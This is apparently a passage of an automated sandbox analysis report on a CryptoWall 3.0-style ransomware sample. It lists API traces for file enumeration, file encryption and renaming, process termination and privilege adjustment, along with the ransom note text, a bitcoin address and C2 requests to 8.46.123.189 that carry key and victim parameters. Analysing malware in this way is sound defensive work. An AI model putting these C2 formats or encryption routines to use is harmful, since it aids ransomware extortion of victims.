                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$Path$FolderThread$File$Load$ExecuteShell_memset$ModuleNameObjectProcessSingleWait$AddressHandleIconInitializeInstanceProcStringToken$AllocateCheckClassCloseCurrentCursorDeleteEnvironmentErrorExitFreeLastLookupMembershipMutexOpenPointerPriorityPrivilegeReadRegisterShortSpecialValueVariableVersion__wfopen_s_fprintf
                                                                                                                            • String ID: %s%s%s%S$.txt$1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$435-3435-4546$:Zone.Identifier$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$E722D94C1CAC34B$KERNEL32$SCAN$SeDebugPrivilege$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\RESTORE_FILES.BMP$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$\Recovery_File_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$open$scan
                                                                                                                            • API String ID: 1728785742-2954225229
                                                                                                                            • Opcode ID: 6cfa9ba4c2f1b833ea24c063e1331d28ece4522e29601cc512096c7d24eb7cdf
                                                                                                                            • Instruction ID: b9353f63490a9340779b0bdb0cd734671b1939fc783d41848026e497fe5a03ea
                                                                                                                            • Opcode Fuzzy Hash: 6cfa9ba4c2f1b833ea24c063e1331d28ece4522e29601cc512096c7d24eb7cdf
                                                                                                                            • Instruction Fuzzy Hash: C502D7B0A40318BEE720EB609C86FEA7678EB58744F50459BF604B61D1D7B86D80CB6D

                                                                                                                            Control-flow Graph

                                                                                                                            • control_flow_graph for function 4139b0: calls FindFirstFileW, wcsstr, FindNextFileW and FindClose, with a call back into 4139b0 (node and edge list omitted)
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findwcsstr$File_memset$CloseFirstNext__wcsdup_free
                                                                                                                            • String ID: IC$ L$.aaa$\*.*$recovery_file$restore_files
                                                                                                                            • API String ID: 2748371789-1963468680
                                                                                                                            • Opcode ID: a8550e159df8c798b7e77e3f41290ecbea0e537c73ceda8fd00c370e833da4db
                                                                                                                            • Instruction ID: 8cd3bdaa977526fda1ac96882a880a1b440355606e10f584730b7f75abe76e56
                                                                                                                            • Opcode Fuzzy Hash: a8550e159df8c798b7e77e3f41290ecbea0e537c73ceda8fd00c370e833da4db
                                                                                                                            • Instruction Fuzzy Hash: 08815BB2A0021456D720EF70DC42BEB7374EF64755F4441A6F909A6286F779ABC8C78C

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A58A
                                                                                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE,00000004,00000000,00000000,00000000), ref: 0041A59F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://ipinfo.io/ip,00000000,00000000,40000000,00000000), ref: 0041A5B8
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C5
                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000000C8,?), ref: 0041A5EF
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041A61D
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62F
                                                                                                                            Strings
                                                                                                                            • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE, xrefs: 0041A59A
                                                                                                                            • 8.46.123.189, xrefs: 0041A618
                                                                                                                            • http://ipinfo.io/ip, xrefs: 0041A5B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead_memset_strcpy_s
                                                                                                                            • String ID: 8.46.123.189$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE$http://ipinfo.io/ip
                                                                                                                            • API String ID: 3451672010-2122521707
                                                                                                                            • Opcode ID: e612f7f2b18badeb7e585ccf4dc9dfb37dad1401e8aef3cf68842487d3f7b7a2
                                                                                                                            • Instruction ID: 15cbbe58e9625973908351285b623f5b827d69d73ed0f1a4b7c35f1f0d30dc65
                                                                                                                            • Opcode Fuzzy Hash: e612f7f2b18badeb7e585ccf4dc9dfb37dad1401e8aef3cf68842487d3f7b7a2
                                                                                                                            • Instruction Fuzzy Hash: B121D8B1A402187BD7219B54AD46FEE7B78DB85710F1000EAFB04B71D1DB742E058BAD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ....................$P6C$P6C$gfff
                                                                                                                            • API String ID: 0-2552349421
                                                                                                                            • Opcode ID: 0eb62f8cffe97e059bdac99334968231d5c34eba919a1b1e0f4c90ae134b41d0
                                                                                                                            • Instruction ID: 1a57dfd0861042f04d653370a4c601d03e899c9ff72e49831f653edbe7fd71a6
                                                                                                                            • Opcode Fuzzy Hash: 0eb62f8cffe97e059bdac99334968231d5c34eba919a1b1e0f4c90ae134b41d0
                                                                                                                            • Instruction Fuzzy Hash: 9BC1C1756083419BC314DF25D8C1AABBBE5FFC9344F008A2EF89987241D775E889CB96
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 0041E871
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041E87B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3874597930-0
                                                                                                                            • Opcode ID: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction ID: 269530095bf515f302acf201c8fd37964e73f2dce42f1b02fb8cc585cf08c6bc
                                                                                                                            • Opcode Fuzzy Hash: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction Fuzzy Hash: DA01B530A002089BDB14DFE4DD46BAEB7B8FF48700F50406DE606A7380DB746944CB99
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 237 413d10-413dbe call 42c690 call 42b910 call 42441c call 42474a GetFileAttributesW 246 413ee1-413ef4 call 423ebb 237->246 247 413dc4-413dc6 237->247 249 413dd3-413dee CreateFileW 247->249 250 413dc8-413dcd SetFileAttributesW 247->250 249->246 252 413df4-413e07 GetFileSize 249->252 250->249 253 413eda-413edb CloseHandle 252->253 254 413e0d-413e0f 252->254 253->246 254->253 255 413e15-413e1b 254->255 255->253 256 413e21-413e71 call 41b290 GetProcessHeap RtlAllocateHeap 255->256 256->253 259 413e73-413e97 ReadFile 256->259 260 413ec0-413ecc 259->260 261 413e99-413ebf CloseHandle GetProcessHeap HeapFree call 423ebb 259->261 262 413ef5-413f22 call 42b910 GetProcessHeap RtlAllocateHeap 260->262 263 413ece-413ed4 GetProcessHeap HeapFree 260->263 262->263 268 413f24-413f59 call 422720 call 41a670 262->268 263->253 273 413f92-413fe5 SetFilePointer WriteFile * 2 268->273 274 413f5b-413f6f GetProcessHeap HeapFree 268->274 275 414001-414026 WriteFile 273->275 276 413fe7-413ffc GetProcessHeap HeapFree 273->276 277 413f70-413f91 GetProcessHeap HeapFree CloseHandle call 423ebb 274->277 275->276 278 414028-414052 WriteFile 275->278 276->277 281 414054-414068 GetProcessHeap HeapFree 278->281 282 41406d-41407d FlushFileBuffers CloseHandle 278->282 281->277 283 414080-414098 MoveFileExW 282->283 284 4140c5-414101 GetProcessHeap HeapFree GetProcessHeap HeapFree call 423ebb 283->284 285 41409a-4140a5 GetLastError 283->285 289 414106-414109 284->289 286 4140b4-4140c3 Sleep 285->286 287 4140a7-4140ae DeleteFileW 285->287 286->283 286->284 287->286
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00413D7D
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413DB5
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413DCD
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DE3
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DF6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E64
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E67
                                                                                                                            • ReadFile.KERNEL32 ref: 00413E8F
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413E9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413EA3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413EA6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413ED1
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413ED4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413EDB
                                                                                                                            • _memset.LIBCMT ref: 00413F00
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413F11
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413F14
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413F5E
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F67
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00413F72
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F75
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413F78
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00413F99
                                                                                                                            • WriteFile.KERNEL32 ref: 00413FBD
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 00413FDD
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413FEA
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413FF3
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 0041401E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041404A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00414056
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041405F
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041406E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00414075
                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414090
                                                                                                                            • GetLastError.KERNEL32 ref: 0041409A
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 004140AE
                                                                                                                            • Sleep.KERNEL32(00000190), ref: 004140B9
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004140DB
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140E4
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004140EF
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$File$Process$Free$CloseHandleWrite$AllocateAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerReadSizeSleep
                                                                                                                            • String ID: .aaa
                                                                                                                            • API String ID: 1162163845-1861201198
                                                                                                                            • Opcode ID: c7964b7a0b8285ae2cbd51e6d8023304e21054539a1ac845c39b0415e82cf461
                                                                                                                            • Instruction ID: 9007e59ba22c1aaf5beb208bc48bb55982d0225d1ffcd51d997189a139798c44
                                                                                                                            • Opcode Fuzzy Hash: c7964b7a0b8285ae2cbd51e6d8023304e21054539a1ac845c39b0415e82cf461
                                                                                                                            • Instruction Fuzzy Hash: 8DB19871A00218ABEB15DBA4DC89FEE777CEF5C315F00419AF609E2290DB745E848B69

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 290 41a030-41a058 call 42c690 293 41a05a-41a06a 290->293 294 41a06c-41a082 call 412640 290->294 295 41a086-41a08e 293->295 294->295 298 41a090-41a095 295->298 298->298 299 41a097-41a099 298->299 300 41a0a0-41a0dc call 42b910 InternetOpenA 299->300 301 41a09b call 41a560 299->301 305 41a0e0-41a205 call 42b910 _alldiv * 2 call 41a650 call 42b910 300->305 301->300 312 41a208-41a20d 305->312 312->312 313 41a20f-41a2df call 42b910 call 41f0c0 call 41f1b0 call 422720 312->313 322 41a2e0-41a2e5 313->322 322->322 323 41a2e7-41a359 call 42b910 call 41a670 call 40e750 call 40ea80 call 412640 322->323 334 41a35b-41a368 323->334 335 41a36a-41a376 323->335 336 41a377-41a3aa call 41a650 call 40e6c0 call 424005 334->336 335->336 343 41a3c0-41a3e4 InternetConnectA InternetSetCookieA 336->343 344 41a3ac-41a3be InternetConnectA 336->344 345 41a3e9-41a436 HttpOpenRequestA call 42b910 HttpSendRequestA GetLastError 343->345 344->345 348 41a438-41a469 InternetReadFile strstr 345->348 349 41a46b-41a48b InternetCloseHandle * 2 345->349 348->349 350 41a491-41a4a2 InternetCloseHandle 348->350 349->305 349->350 351 41a549-41a54b ExitThread 350->351 352 41a4a8-41a4c6 call 424005 350->352 355 41a4c8-41a4ca 352->355 356 41a4cc-41a4e0 call 40e7d0 352->356 357 41a52a-41a52c 355->357 363 41a4e2-41a4e6 356->363 364 41a53d 356->364 359 41a542-41a544 call 40e6c0 357->359 360 41a52e-41a53b 357->360 359->351 360->359 365 41a513-41a528 363->365 366 41a4e8-41a4ef 363->366 364->359 365->357 367 41a4f1-41a4f5 366->367 368 41a4f8-41a509 366->368 367->368 368->365 371 41a50b-41a510 368->371 371->365
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A0B5
                                                                                                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0,00000000,00000000,00000000,00000000), ref: 0041A0C6
                                                                                                                            • _memset.LIBCMT ref: 0041A0EE
                                                                                                                            • _alldiv.NTDLL(0384BF10,00000000,00000400,00000000), ref: 0041A16D
                                                                                                                            • _alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041A17A
                                                                                                                            • _memset.LIBCMT ref: 0041A1BC
                                                                                                                            • _memset.LIBCMT ref: 0041A21B
                                                                                                                            • _memset.LIBCMT ref: 0041A304
                                                                                                                            • _free.LIBCMT ref: 0041A38A
                                                                                                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041A3B0
                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00C03380,00000000), ref: 0041A3FA
                                                                                                                            • _memset.LIBCMT ref: 0041A417
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A428
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A42E
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000C16,?), ref: 0041A44B
                                                                                                                            • strstr.NTDLL ref: 0041A45E
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A472
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A475
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0041A496
                                                                                                                            • _free.LIBCMT ref: 0041A4AD
                                                                                                                            • ExitThread.KERNEL32 ref: 0041A54B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CloseHandle$HttpOpenRequest_alldiv_free$ConnectErrorExitFileLastReadSendThreadstrstr
                                                                                                                            • String ID: $ KC$,JC$---!!!INSERTED!!!---$/inst.php?%s$/wp-content/themes/r.php?%s$1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$2.0.4e1$8.46.123.189$GET$Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0$Subject=%s&key=%s&addr=%s&size=%lld&version=%s&OS=%ld&ID=%d&gate=%s&ip=%s&inst_id=%X%X%X%X%X%X%X%X$eirutyerg23895385tiyiruytyieye$gj$IC
                                                                                                                            • API String ID: 1974382559-2346157570
                                                                                                                            • Opcode ID: 41994da5b1be1fb6a75406e9cb8cd053ad74d2b3d8e99e9ae054abe7998559ef
                                                                                                                            • Instruction ID: 54ce2dd3979e93718385dbc83f77f21fcc090a503bd1d9ebae0c96c4fc529177
                                                                                                                            • Opcode Fuzzy Hash: 41994da5b1be1fb6a75406e9cb8cd053ad74d2b3d8e99e9ae054abe7998559ef
                                                                                                                            • Instruction Fuzzy Hash: 47D116B1108344AFD310DF65DC84FEBB7E8EB89348F04492EF589A7251D778A944CB6A

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 373 41e5b0-41e5fb call 42c690 call 42b910 GetCurrentProcessId 378 41e791-41e793 ExitThread 373->378 379 41e601-41e607 373->379 380 41e610-41e62b K32EnumProcesses 379->380 381 41e631-41e644 380->381 382 41e784-41e78b 380->382 383 41e763-41e77e call 42b910 Sleep 381->383 384 41e64a 381->384 382->378 382->380 383->382 385 41e650-41e65d 384->385 387 41e663-41e665 385->387 388 41e75a-41e75d 385->388 387->388 390 41e66b-41e67d OpenProcess 387->390 388->383 388->385 391 41e683-41e6b2 call 42b910 K32GetProcessImageFileNameW 390->391 392 41e74d-41e74e CloseHandle 390->392 396 41e6b5-41e6be 391->396 393 41e754 392->393 393->388 396->396 397 41e6c0-41e6c4 396->397 397->393 398 41e6ca-41e6d6 call 424733 397->398 400 41e6db-41e6ee wcsstr 398->400 401 41e6f0-41e703 wcsstr 400->401 402 41e744-41e747 TerminateProcess 400->402 401->402 403 41e705-41e718 wcsstr 401->403 402->392 403->402 404 41e71a-41e72d wcsstr 403->404 404->402 405 41e72f-41e742 wcsstr 404->405 405->392 405->402
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
